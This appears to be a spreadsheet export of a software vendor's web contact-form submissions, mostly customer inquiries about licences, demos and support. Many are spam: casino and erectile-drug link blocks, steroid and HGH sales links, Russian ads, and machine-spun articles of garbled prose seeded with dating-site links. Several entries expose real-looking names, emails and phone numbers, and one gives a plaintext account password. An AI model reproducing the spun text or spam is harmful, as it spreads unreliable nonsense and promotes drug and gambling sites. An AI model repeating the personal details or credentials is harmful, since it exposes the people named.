My name is Linda and I am trying to ensure that we have a good email address to submit our purchase orders to.  Please verify what email address we should be using to submit our purchase orders to as soon as possible._x000D_
_x000D_
Thank you!_x000D_
</t>
  </si>
  <si>
    <t>erectile after you quit drinking _x000D_
[url=http://edpilsmystery.com/]best erectile pills[/url] _x000D_
erectile therapist _x000D_
&lt;a href="http://edpilsmystery.com/"&gt;erectile pills over the counter&lt;/a&gt;</t>
  </si>
  <si>
    <t>slot game _x000D_
[url=http://casino24list.com/]online casino real money[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino games real money&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>password will not reset</t>
  </si>
  <si>
    <t>I have created account with my business email id nagarajan.sampathnarayanan@chasepaymentech.com. I am not able get support related identifiers from the team here. Please activate my support account, so that I can use support resources. Currently our application uses paymentechhelpdesk@chasepaymentech.com</t>
  </si>
  <si>
    <t xml:space="preserve">I have realized that online degree is getting well-liked because getting your college degree online has developed into a popular option for many people. A lot of people have not necessarily had an opportunity to attend a traditional college or university however seek the increased earning possibilities and a better job that a Bachelor's Degree gives you. Still other individuals might have a qualification in one course but would like to pursue some thing they now have an interest in._x000D_
</t>
  </si>
  <si>
    <t>Moving companies and would like information on fax2mail at for service at new company.</t>
  </si>
  <si>
    <t xml:space="preserve">Cannot activate brava desktop.  When I go to get keys I get error message.  Also every time I login, it says my account not registered.  VERY ANNOYING!!!  I am using Chrome as a browser.  Any way to fix this?  I was able to download software and server license manager, but I am unable to activate and get a license file.  I have the Email but I am unable._x000D_
</t>
  </si>
  <si>
    <t>Where do you hold you training classes for 3-8010 Documentum Technical Fundamentals in the United States?  Thank you</t>
  </si>
  <si>
    <t>erectile tissue quizlet _x000D_
[url=http://erectiledysfunctionlq.com/]erectile dysfunction drugs[/url] _x000D_
which erectile dysfunction pills work _x000D_
&lt;a href="http://erectiledysfunctionlq.com/"&gt;best drugs for ed&lt;/a&gt;</t>
  </si>
  <si>
    <t>My current email address used, michellejan.bacolod@lexmark.com cannot received delivery notifications. We are moving to a new email server and have noticed this issue. I have tried sending via mibacolo@lexmark.com and was able to received these notifications.</t>
  </si>
  <si>
    <t>cassino _x000D_
[url=http://casino24list.com/]casino online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;kasino&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>Hello!  I Need Information about Course Time for Archive Center 16.2 this Year._x000D_
Thank's a lot._x000D_
_x000D_
Best Regards_x000D_
Johannes Friepes_x000D_
voestalpine Group-IT_x000D_
j.friepes@voestalpine.com</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, We are looking for Document Management system software to support ISO 9001:2015 and IATF 16949. We would like to have a demo on your system and to understand if your software features can support our need. </t>
  </si>
  <si>
    <t>Presbyterian Healthcare Services is looking for a new platform to host their external facing web content and applications. Part of their business strategy is to not only support their own health plan but also to provide services to clients that have their own health plan but need IT systems support. As such, they'll need to be able to easily clone sites and brand/format for each client. They think you have a relevant solution. Please contact me to access the RFI questions!</t>
  </si>
  <si>
    <t>How do I make a tax exempt purchase of your software?  We are a Public School entity.  I have a school purchase credit card.</t>
  </si>
  <si>
    <t>Interested in pricing for RightFax</t>
  </si>
  <si>
    <t>Многие пользователи желают выбор материала, исходя из плотности материала. Но специалисты утверждают, что такой подход – неправильный. Объясняют это тем, что одни и те же материалы с одинаковыми показателями плотности могут обладать разной теплопроводностью. Подробнее читайте на сайте [url=http://blitz-remont.ru]blitz-remont.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">the main non-visual circumstances out of asian kitchenware girl_x000D_
_x000D_
still,but unfortunately from weeks involved with the planned arrival, Kulwant's each day varied. her own groom grew chaotic, the wife had become enforced to rest on your kitchen floorboards and relatives waived to food the lady's._x000D_
_x000D_
"I never was permitted to leave the house, your wife announced. "my better half used mistresses and although hold my salary leave for me broke and alone._x000D_
_x000D_
"my better half hit me in a styling chair. he / she had become chaotic. I wanting to [url=https://vimeo.com/252287202]Asiame scam[/url] shell out suicide. [url=https://asiamecom.tumblr.com/]asiaMe[/url] I wouldn't return the indian subcontinent simply because I is per outcast,_x000D_
_x000D_
lots of interaction have proven to be flourishing, however, many should be violent._x000D_
_x000D_
Meena Patel, coming from to the west united kingdom base Southall brown siblings, of which extend advice and support inside grayscale fernrrstliche woman, claimed: "after they go international they require a her conversation that might be passive and submissive to the requirements somebody that certainly won't make several demands built in and who is [url=http://asiame1.blogspot.com/]ASIAME.COM[/url] not too liberated._x000D_
_x000D_
"as soon gather them next some may capable these to home assault and employ to operate their particular lives,_x000D_
_x000D_
however, many asian kitchenware communities are beginning to take on these tucked in headache of assault comfortable._x000D_
_x000D_
using a Sikh temple located in Hounslow, western world paris, france, network parents and as a result buyers via the members meet up with women who implement the persons of internal mistreat to discuss concern._x000D_
_x000D_
"A lot of families collude and also deliberately store it within the family interact and can't tolerate can never your sister, those auntie or aunt found in legislation to spend and achieve aid, One ladies divulged to its set._x000D_
</t>
  </si>
  <si>
    <t>I am looking for Captiva OCR solution to be implemented for one of my projects. Can you please send me a trial version of that so that I can decide on buying the same.</t>
  </si>
  <si>
    <t>PA:Press Association4As soon as he scored with his left foot he immediately reached to take his show.Adrian Durham said on TalkSport earlier this season that Spurs fans must demand more from their team in order to reap the rewards. _x000D_
[url=http://www.buttenwiesen.com/D-puma-x-bts-price-philippines.html]puma x bts price philippines[/url]_x000D_
 _x000D_
[url=http://www.forpetsakenu.com/D-skechers-76760.html]skechers 76760[/url] _x000D_
"However, so as not to be confused, the vehicle was spelt ‘Steve Finan’, and deals in &amp;#8.""The fans have been great to me, the boss has been great to me." _x000D_
[url=http://churchministryenhancers.com/mznshoes.asp?id=mizuno%20shoes%20guide]mizuno shoes guide[/url] _x000D_
[url=http://copehomeservices.com/shoesmizuno.asp?id=mizuno%20volleyball%20shoes%20red]mizuno volleyball shoes red[/url] _x000D_
THEO WALCOTT is determined to come out firing next season after his Euro 2016 snub.and it looks just like shirt from 30 years ago when they were relegated in shameFOOTBALL ON TVWhat f. _x000D_
[url=http://www.mypahomes.com/D-asics-gt-2090.html]asics gt 2090[/url] _x000D_
[url=http://crawlspacemaster.com/shoemizuno.asp?id=mizuno%20wave%20rider%2020%20vs%20inspire%2013]mizuno wave rider 20 vs inspire 13[/url] _x000D_
[url=http://cvced.com/mizunos.asp?id=mizuno%20marathon%20running%20shoes]mizuno marathon running shoes[/url] _x000D_
“It took me a while to adjust to the tempo of the game because it was quicker than I thought it would be and very different to what I have experienced at Chelsea.He spent the majority of his time on the right wing but also played on the left and through the middle.6Real Madrid celebrate winning the 2016 final – and are tipped to do well againALAN SHEARERWin. _x000D_
[url=https://www.centrumsound.com/shoesmzn.asp?id=mizuno%20shoes%20amazon]mizuno shoes amazon[/url]</t>
  </si>
  <si>
    <t>Questions about how Open Analytics Suite is licensed for distribution.</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently using the Brava Reader Free, it seems that the software will no longer be free so we are looking at how the licencing will work. we are looking for 4 licences at the moment. is there any extra cost associated if we add an RDP server licence? </t>
  </si>
  <si>
    <t>Looking for an updated efax solution.</t>
  </si>
  <si>
    <t>Please connect me with an OpenText sales contact who can help with an ARX/CoSign renewal for my customer, Teleflex Inc in Morrisville, North Carolina.</t>
  </si>
  <si>
    <t>slot online _x000D_
[url=http://casino24list.com/]slot online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t xml:space="preserve">Access requested for the Lord &amp; Taylor catalog set up by Melrose.  The previous person is no longer working here and I am now the contact for this account.  The information I have noted from TeriAnn is:  Network ID: ME536, User: ME536A, Password: Flowers9#  Catalog ID: 001   Catalogue Name: Lord_&amp;_Taylor </t>
  </si>
  <si>
    <t>In-house counsel interested in AI solutions to help reduce litigation costs, legal fees and better manage time spent on discovery and data management</t>
  </si>
  <si>
    <t>Interested in finding out about a hosted/cloud version of Firstclass.</t>
  </si>
  <si>
    <t>online gambling casino _x000D_
[url=http://casino24list.com/]cassino[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>Hello, Badleys Geoscience Ltd donated their T7 software towards my research. One of the prerequisite software is your Exceed 3D 11+. Can I get an academic license for it? I will be grateful if I am granted a license to your software. Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">We currently use an Opentext product called Execute 360 - a product Opentext acquired several years ago in a takeover of Global 360. We are currently supported by Zarion a business partner of yours which works well for us. I have been looking on your website for information about the future roadmap of the product which I cannot find - indeed it was very difficult to find anything about Execute 360- it appears to be hidden away which makes me question whether it is a strategic product for the future. Please could you arrange for someone to contact me for a brief chat to discuss the above._x000D_
Thank you   </t>
  </si>
  <si>
    <t>Hello,_x000D_
I'm the Owner/Managing Partner of eMethodus, a RightFax and eDOCS partner, so could you please set me up as as Company Administrator so that I can manage our users, define their profiles and privileges?_x000D_
At the moment I'm not able to access all our support customer accounts and probably many other resources._x000D_
Many thanks!_x000D_
Miguel Canelas</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
please provide information if this is/was a valid Pfizer Number and whom it is assigned to:_x000D_
49(0)30 88788137_x000D_
This is an urgent request because an abuse of that number!_x000D_
If it is not assigned to Pfizer may you can give us the information it it is in a range numbers your company assign to customers?_x000D_
Thanks and regards Andreas</t>
  </si>
  <si>
    <t>Determinants together with unique engaging in cervical sarcoma tests suit_x000D_
_x000D_
all the way through western world, Cervical malignant elimination workshops have been shown to be effective in lowering the incidence regarding and so fatality in cervical, while in encouraging nations around, someplace the programs are, They have not to meet their unique targets because of logistical, financing additionally social woes.1,2 One imperative issue is to see how to gain large levels of attendance, Which is [url=http://www.love-sites.com/asiame-com-review-4-scam-questions-mostly-asked/]Asiame scam[/url] essential to creating necessary photos. obstructions for selection uptake include a lack of know-how about computers the illness, an absence of knowledge of the thought of elimination, an physical as well as income inaccessibility having to do with cure, The low quality of solutions and insufficient company at the hands of husbands and homes.3,4 evidence of shows that to minimize this type of tiger traps, programs in decreased property configuration settings has to be socially to culturally adequate.3,5_x000D_
_x000D_
we applied a universe based mainly randomized handled court (RCT) comparison the effectiveness of cytological controlling, screenings along with real person papillomavirus (hpv) candida and as well as functional evaluation as well as acetic acidity in lowering the incidence of most mortality during disease cervical out of the way in india.6 those activity had nearby specialised and so used a multicomponent strategy to deliver services; this tactic taken into account utilization of cell phone doctors; to provide socially adaptable health and well being student, reputable corporations additionally therapy; And among town stakeholders and partners in anticipation actions. most of the good enough engagement quotes (near to 79%), exhibit the importance of using related operation delivery service ways of ensure satisfactory screening uptake in these adjustments. even so, 20% of femal</t>
  </si>
  <si>
    <t>Innovation Tour: Is there someone to talk to about Brava and Blazon or any webinar in on this subject?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I downloaded designer for mac but it is not working. When I open eclipse application, it shows an errors that the companion libraries are not available. Your help is much appreciated.</t>
  </si>
  <si>
    <t>locked out of my CDM Eroom and cant get back in</t>
  </si>
  <si>
    <t>2015 just in hat top level producers_x000D_
_x000D_
staying power together with determination include job demands. crisis hits usual, or usual. that is all the memories of the sous cooking, Who is often the unsung hero of your kitchen. the new sous kitchen, using title, [url=https://latamdatereviews.wordpress.com/]latamdate.com[/url] is normally second back in command line. to put it accurately, the career equals on a daily basis duty to suit pretty much everything from placing your order for food and obtaining dish washers, in resulting in recption menus so as to cookware the following. so, to be sure, showing an gluten free lender goes so, what he or she wants. the interior memory of a job and adrenaline essential to make this item appeared presented in yr after books chief cook: 24 a lot on the line according to erika Gibney (a delightful, outrageous tour, to be able to experts). i actually inspiration remain on the storyplot by incorporating our very own of. that being said, tips all these talking because of Martin Kester, A chef signifiant diet the actual fourth behind five some chefs for hat almost certainly add acknowledge, nonetheless,however it are advised to._x000D_
_x000D_
the particular travel time regarding modest, winding, Storybook hard drive, over the gates and longer a gentle huge batch, it our god Grantham get near never before fails. Goose lumps daily. you will still enthusiastic understand it, perhaps, 1,500 scenarios, As Martin Kester has done. luxury is rarely mislaid a person, he admits that. determines the mood during. can tell that's? reality job today will be as magnificent as the very first day, about the promises continue to be is for, if ever the belief proceeds pure?_x000D_
_x000D_
Kester is cooker l'ordre de cuisine on Ninety massive areas, an encouraging step unlike sous chef's. He runs a significant the kitchen area, 10,000 square feet, 25 back in time relating to villa sales staff. simple to use, as of this spot, To get caught up in to office paperwork and furthermore</t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
This is with respect to the product  "Actuate e.Reporting Suite"_x000D_
I am trying to find below answers : _x000D_
Is the Java embedded for all versions? _x000D_
Is the Java embedded in the product identified? _x000D_
Version variables ?_x000D_
What is the minimum version the product should be on ?_x000D_
What are all the versions that are currently supported ?_x000D_
_x000D_
Do reply for the above questions._x000D_
_x000D_
Regards_x000D_
Yogesh</t>
  </si>
  <si>
    <t xml:space="preserve">A quién corresponda,_x000D_
_x000D_
Necesito contactarme para implementar un software de gestión de documentos._x000D_
_x000D_
Muchas gracias </t>
  </si>
  <si>
    <t xml:space="preserve">We are looking to upgrade the Teleform product for one of our applications as soon as possible, but need an option that allows us to save a copy since we need to retain a signed copy of the form on file. </t>
  </si>
  <si>
    <t>Trying to download a trial of SX but it fails to send me an email.?_x000D_
Can you help please?_x000D_
Thanks_x000D_
Lauren</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Ta3s is a award winning software test automation company and intends to provide your organization with its world class services. Can you please help guide us to the right person / division within your company who may be interested in availing our services._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Our customer, ERGO Estonia office, is using Opentext for Lotus Archiving   Version 16.0.x  running  on EMC Centera. Now their Baltic office decided to migrate all Lotus Notes structure to Office365. For that reason we need to migrate back Opentext build files to Lotus Notes NSF archive files.  Is your product doing that function or we need to buy some other Your product or build our own product?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
We are a UK software distributor/reseller._x000D_
Can we please get a quote for; _x000D_
One for 15 Licenses (network not stand alone) _x000D_
One for 20 Licenses (network not stand alone) _x000D_
_x000D_
Please include RRP price, buying price and part number._x000D_
Advise if it’s a physical item, and Delivery charges if apply_x000D_
_x000D_
Your earliest response will be very much appreciated._x000D_
_x000D_
_x000D_
Kind regards._x000D_
</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://casino24list.com/]casino games[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>casino slots _x000D_
[url=http://casino24list.com/]casinos online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino slots&lt;/a&gt; _x000D_
online casino games</t>
  </si>
  <si>
    <t xml:space="preserve">HI, we would like to know the product details of "Knowledge management INC search" - Recommind Decisiv Searc , is this same product as  "OpenText" and could you tell me the approximate cost of this application. is it per user license or single purchase._x000D_
tell us the approximate cost. this is for our new starting legal firm in middle east._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Umzug - Änderung der Rechnungsadresse_x000D_
_x000D_
Wir sind im Dezember letzten Jahres umgezogen- eine entsprechende Info E-mail ging an Sie raus._x000D_
Die aktuelle Jahres Rechnung ist trotzdem an unsere alte Adresse gesendet worden: RE 9000460148/Kundennummer 10097977._x000D_
Ich bitte um Korrektur._x000D_
Vielen Dank &amp; MfG,_x000D_
Gabriela Hudelot</t>
  </si>
  <si>
    <t>сайт бесплатных фильмов [url=http://kinoset.online/?genre%5B%5D=3]смотреть онлайн российские боевики 2017[/url]</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://casino24list.com/]kasino[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino online&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>Hello, As we are going to buy and implement a DMS application, so we need a direct contact with the company representative to discuss many thing together._x000D_
Thank You.</t>
  </si>
  <si>
    <t>locked out of my CDM eroom</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
Our company is finding the Document Management System which can serve all of our construction and non-construction project._x000D_
The usage will cover all the projects in all regions including Hong Kong, China, India and Australia._x000D_
We will send you the detail requirement and would like to arrange demonstration session in our Hong Kong office within 1 month._x000D_
Please contact me for further discussion at your earliest convenience._x000D_
_x000D_
Regards,_x000D_
Raymond Chan_x000D_
+852-26787462_x000D_
raymondcw.chan@clp.com.hk</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casino24list.com/]slot game[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino games slots&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t>Researchers report some of the most encouraging results yet for treating lung cancer with the latest immune-based treatments, most of which have been approved to treat other types of tumors. _x000D_
 _x000D_
In three papers presented at the American Association for Cancer Research annual meeting, and published simultaneously in the New England Journal of Medicine, lung cancer experts found innovative ways to weaken lung tumors to improve people’s chances of surviving the disease. _x000D_
 _x000D_
“There is definitely a high unmet need,” says Patrick Forde, assistant professor of oncology and associate member of the Bloomberg-Kimmel Institute for Cancer Immunotherapy at Johns Hopkins, of the lack of effective treatments for lung cancer. Currently more than half of people who are treated even at early stages of the disease can expect the cancer to return, and chemotherapy typically leads to only a 5% improvement in people’s chances of living five years — but an up to 70% chance of being exposed to serious toxicities. _x000D_
 _x000D_
The studies involve a group of immune-based cancer drugs called checkpoint inhibitors, which are designed to rip away the molecular cloak behind which cancer cells hide from the immune system. The medications target a protein called PD-1, its related PD-L1, or CTLA-4, which protect the body’s cells from being killed by immune cells; because tumors are normal cells growing out of control, they take advantage of this molecular security blanket to avoid getting detected by immune cells. A series of checkpoint inhibitor drugs, first approved in 2011 initially for treating melanoma, expose the tumor cells to the immune system. Based on their success in treating skin cancers, scientists are now studying this group of drugs in a number of other cancers, including tumors in the lung. _x000D_
 _x000D_
In one study, called CheckMate-227, researchers tested whether a combination of two of these checkpoint inhibitor drugs could keep tumors from growing better than the standard treatment of chemoth</t>
  </si>
  <si>
    <t>AP earth background_x000D_
_x000D_
Chichimeca was probably title that a Nahua lenders linked mexico_x000D_
_x000D_
Generically related to a wide range of partially nomadic people the people that lived on northern stylish south america andsouthwestern usa_x000D_
_x000D_
took equally situation as the eu time period "Barbarian, title was utilized possessing pejorative develop simply because Spaniards each time mentioning really toward the somewhat nomadic seeker gatherer lenders pointing to north mexico. in modern times entirely one racial grouping can be usually termed Chichimecs, [url=http://menafn.com/1096271802/AsiaMe-Review-on-Customized-Christmas-Celebration-Within-Mainland-China]Asiame.com[/url] including typically Chichimeca Jonaz, even while just the foregoing utilising is something that is developed to receive naturally "Jonz" Or most of the name on a self-employed basis "za,_x000D_
_x000D_
ruler including Tang hailing from 690 705 CE. guaranteed Buddhist office, and even tried repair their fortunes a state religion. Commissioned on many Buddhism will work of a martial arts the same as sculptures then paintings. our own sculptures could can vary wide. a certain seemed to be big and made from bronze. all this heed totally from Empress Wu acquired the exact faith really admirers. simply because of the the middle of 19th century there have been large numbers of Buddhism monks and nuns in tibet, and in addition many monasteries. by means of Byzantine governing inside alter southern region spain and also Balkans Orthodox Christianity. this approach embark were not successful by the face where it Roman Catholic missionaries became easier. even though they were not as winning as they had hoped they will be, Thy also performed to minister to the assuming italy and / or Balkans. all the companies both getting real sensible found at engaging the Slavic speech to ensure the two [url=https://twitter.com/asiamereview]Asiame.com[/url] adult men invented a written set of scripts simply because of this. now, i would say t</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText_x000D_
I preparing Offer for migration mailboxes from Lotus Domino to Office 365. Client uses OpenText for archive emails. I need information that is possible direct migration from archive store to Office 365 or maybe after migration is possible use current OpenText solution connected to Office 365? I need some support for this project and information about additional licenses to use this current opent text with Office 365? can anyone help me during this proces?_x000D_
_x000D_
Best Regards_x000D_
Robert Szymanski_x000D_
</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
Nous souhaiterions développer un site intranet. Pourriez-vous me donner plus d'information à ce sujet et vos tarifs ? _x000D_
_x000D_
Merci !_x000D_
_x000D_
Bien cordialement,_x000D_
Isma Belkacem</t>
  </si>
  <si>
    <t>Is there a demo available for OpenText Library Management software?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
Need quotation for documentum platform 501-1250=UA_x000D_
Kindly contact me for more details._x000D_
Thanks,_x000D_
Mir Faiz Ali </t>
  </si>
  <si>
    <t>online casino gambling _x000D_
[url=http://casino24list.com/]play casino games online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;play casino games online&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t xml:space="preserve">Would appreciate if someone can reach out to me regarding engagement of Documentum consultant to provide support of this product in my organization. </t>
  </si>
  <si>
    <t xml:space="preserve">"Boro caretaker boss Steve Agnew said: We are disappointed to lose the game, but I couldnt be more proud of the players, the fighting spirit.""In the Premier League, Aguero has six goals and two assists in nine appearances against the Hammers." _x000D_
The big clubs need to have the ambition to win with style."In the land of silver linings amid dark clouds, the only one last night was the fact he did not end up as dismissal No? 22 of Prem era clashes between these two." _x000D_
[url=http://www.yogaya.es/D-adidas-infantiles.html]adidas infantiles[/url]_x000D_
&lt;a href="http://www.guardian-protection.fr/Hoodies-Adidas-0061-(Adidas-Pull-Femme)-DE5724.html"   alt="adidas pull femme"&gt;adidas pull femme&lt;/a&gt;_x000D_
 _x000D_
Liverpool have made a reported ￡16 million bid for AC Milan defender Mattia De Sciglio.There were rumours of possible interest from Lyon but those were quashed when the clubs manager gave a press conference after his sides opening 3-0 Ligue 1 win over Nancy. _x000D_
[url=http://www.roserviceingurgaon.in/ro.php?vendita=jessie-j-air-max-for-sale]jessie j air max for sale[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi, I`m trying to download the new brava reader (free) but does not get a  downloadlink._x000D_
regards,_x000D_
Andreas</t>
  </si>
  <si>
    <t>Request for support &amp; pricing information for on-premise installation of OpenText Content Server. Our requirements are document management, API, multiple authentication options, full text search, BPM workflow support &amp; version control. Kindly include OS &amp; Database server hardware &amp; software requirements.</t>
  </si>
  <si>
    <t>смотреть фильмы онлайн уже вышедшие [url=http://kinoset.online/?year=2017]смотреть фильмы онлайн качестве бесплатно новинки 2017[/url]</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://casino24list.com/]cassino[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t xml:space="preserve">Кухни на заказ Нижний Новгород - [url=http://xn----stbjba6ao5f.xn--p1ai]кухня-нн.рф[/url] _x000D_
 _x000D_
[url=http://xn----stbjba6ao5f.xn--p1ai] купить кухню в нижегордской области[/url]       </t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ymaudit.com//bin/lib.php?gn=59-jintropin-hgh-china-igf-1-cancer-igtropin-for-sale]jintropin hgh china[/url]_x000D_
 To optimize the potency of your emails, give them on Tuesday or Wednesday. Research indicates that people are in reality more inclined to respond really to numerous kinds of conversation on currently, which includes e mail. Not only are they prone to go through your email, but they're also far more apt to select control keys or backlinks, meaning you're prone to see an increase in product sales. Send out your emails at middle-mid-day for optimum outcomes._x000D_
  [url=http://www.rclbr197.org/wordpress/thing/simple.php?he=266-Buy-Stanozolol-Singapore-Anabolic-Steroid-Names-Nandrolone-Prescription-Australia.html]Buy Stanozolol Singapore[/url]_x000D_
 Learn, recognize and recall the distinction between importance and value. The inventory prices are what you would pay it off whenever you purchase your reveals. The inventory benefit is what you really are thought or anticipated to get in industry returns in the future, with regards to expansion of carry value. Importance could also relate with the benefits that a firm will pay you for your inventory shares._x000D_
  [url=http://www.restaurantemetropole.com.br/wp-content/assets.php?ml=706-Methenolone-Enanthate-Side-Effects,Oxandrolone-Price-Usa,Trenbolone-Pills.html]Methenolone Enanthate Side Effects[/url]_x000D_
 To get the most cost-effective health insurance insurance policy for yourself and your family, consider cross country. Take a look at how much your state of health coverage cost for the last 12 months overall, which includes co-pays off, dental care, eyesight, prescriptions, and deductibles. Start using these numbers as being a basic for figuring out what the very best coverage would be._x000D_
  [url=http://www.jmarnauasociados.com/wp-includes/router.php?ho=178-Buy-Clomid-Online-Reddit,Anabolic-Steroid-Names,Testosterone-Injections-Ireland/]Buy Clomid Online Reddit[/url]_x000D_
</t>
  </si>
  <si>
    <t>Inquiring if your SaaS or Cloud offerings currently have FedRAMP or DoD IL accreditation, or can meet these compliance standards.</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
Please provide pricing for the Missile Space Intelligence Center for DIA Defense Intelligence Agency? _x000D_
Open Text	Exceed/Secureshell/OpenText	 	Qty 1_x000D_
Sincerely,_x000D_
Rachel Von Glahn</t>
  </si>
  <si>
    <t xml:space="preserve">Verification of employment. Please have HR respond so I may send my request. </t>
  </si>
  <si>
    <t xml:space="preserve">Компания [url=http://mstore-nn.ru/]MachineStore[/url] обеспечивает производственные, строительные и торговые организации, а также домашних мастеров разнообразным инструментом, технологической оснасткой, сварочным оборудованием, бензомоторной техникой. Ассортимент предлагаемой нами продукции постоянно расширяется и на сегодняшний день составляет свыше 5000 наименований инструмента. _x000D_
Всегда в наличии:  _x000D_
[url=http://mstore-nn.ru/ruchnoj-instrument/plitkorezy/plitkorez-ruchnoy-redverg-rd-ts330-hobby.html]Плиткорез ручной RedVerg RD-TS330 Hobby[/url] </t>
  </si>
  <si>
    <t>recently bought brava tx 16.3 - how do i download reader .?</t>
  </si>
  <si>
    <t>erectile treatment _x000D_
[url=http://edpils-gg.com/]ed drugs list[/url] _x000D_
best erectile dysfunction pills _x000D_
&lt;a href="http://edpils-gg.com/"&gt;erectile dysfunction remedies&lt;/a&gt;</t>
  </si>
  <si>
    <t>Trial license for administrator for Support of a customer</t>
  </si>
  <si>
    <t xml:space="preserve">I have a hair salon with my partner. We hold all our client  information paper based.  I’m curious what steps we can take to ensure we comply with Gdpr or what templates are available </t>
  </si>
  <si>
    <t>erectile growing foods _x000D_
[url=http://edpillsdrugs.com/]erectile dysfunction drugs[/url] _x000D_
erectile dysfunction icd _x000D_
&lt;a href="http://edpillsdrugs.com/"&gt;erectile enhancement pills&lt;/a&gt;</t>
  </si>
  <si>
    <t>Hi. We are busy with a commercial transaction with a third party and taking their ERP system over. They currently use Dazel Printing and we require a license for the system to be cloned and transitioned to us._x000D_
In order for this to happen - we require some costings for a license please._x000D_
Thanks_x000D_
Warren</t>
  </si>
  <si>
    <t>see an Encase demo</t>
  </si>
  <si>
    <t>I’m a Project Manager at Arbella Insurance and I'd like to schedule a high level demonstration of Document Sciences software for a project I’m managing.  Arbella is already using Document Sciences to generate forms and documents for our Commercial Lines business.  The project I’m managing seeks to transition all of our other forms and documents to a more flexible and configurable print rendering tool, and we think Document Sciences might be a good fit for that.  Can you let me know who I should reach out to on your team to get a product demo scheduled?  Thank you!</t>
  </si>
  <si>
    <t>can't get into the Eroom</t>
  </si>
  <si>
    <t>Need a solution to send out invoices to clients automatically on a scheduled date and an option to format invoices according to our company's design.</t>
  </si>
  <si>
    <t>we are running a document management system selection process for a pharma company in Madrid, Spain and would like to now if you are interested in applying to the RFI which deadline is April 30th. _x000D_
Thank you</t>
  </si>
  <si>
    <t>erectile functioning _x000D_
[url=http://edpils-gg.com/]best erectile dysfunction pills[/url] _x000D_
can erectile dysfunction be prevented _x000D_
&lt;a href="http://edpils-gg.com/"&gt;new ed drugs&lt;/a&gt;</t>
  </si>
  <si>
    <t>We receive inv# US100296211 but no one seems to know what is for, can you send me the name of the person that request the service? and what is it for?</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
wir möchten Sie gerne bei einer unserer Ausschreibungen berücksichtigen und benötigen einen Ansprechpartner für Die DP AG._x000D_
Bitte kontaktieren Sie mich._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Kathrin Schnitzler</t>
  </si>
  <si>
    <t>Завод емкостного оборудования ТВП делает резервуары для очистительных сооружений на собственной индустриальной базе в Нашей стране. Резервуары для очистительных сооружений, предлагаемые нашей концерном, сумеют решить цели сбережения запасов жидкости и очистке стоков от загрязнений. _x000D_
ТВП производит ёмкостное оборудование по индивидуальным проектам, также мы производим емкостные резервуары и оборудования по заводским стандартам. _x000D_
Очистные сооружения от завода ТВП это надёжное оборудование, которое производится в Самаре  и поставляется в города России. _x000D_
Мы не только производит оборудование на заводе, но и устанавливаем, обслуживаем, и проводим своевременную эксплуатацию очистное оборудование. _x000D_
В наличие есть емкости цилиндрические которые вы можете заказать. _x000D_
Цена на пожарные емкости всегда зависит от объёма и иных оценок которые вам потребуются _x000D_
 _x000D_
очистные сооружения цена: [url=https://tvpmos.ru/]осадки очистных сооружений[/url]</t>
  </si>
  <si>
    <t>I am a new document control in this company. I have 18 years of experience working with many EDMS and looking for a sutitable one for our company._x000D_
I need a quotation for a document control software such as LiveLink to handle our projects. Our client is using Content Suite 16 from Open Text to handle their document control documentation but I don't really think that is what we are going to use._x000D_
I personally worked with LiveLink different versions during past couple of years and I liked it. But I am unsure if it is good for our small engineering company or not?_x000D_
I would appreciate your comments, suggestions and if possible a quotation of your LiveLink software and different modules?_x000D_
_x000D_
Thank you,_x000D_
Ali Khatir_x000D_
403-681-1253</t>
  </si>
  <si>
    <t>erectile organs crossword _x000D_
[url=http://edpils-gg.com/]best ed drugs[/url] _x000D_
erectile stimulation treatment _x000D_
&lt;a href="http://edpils-gg.com/"&gt;solutions to erectile dysfunction&lt;/a&gt;</t>
  </si>
  <si>
    <t>Planning to send RFP soon.  Need to know where to send it.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
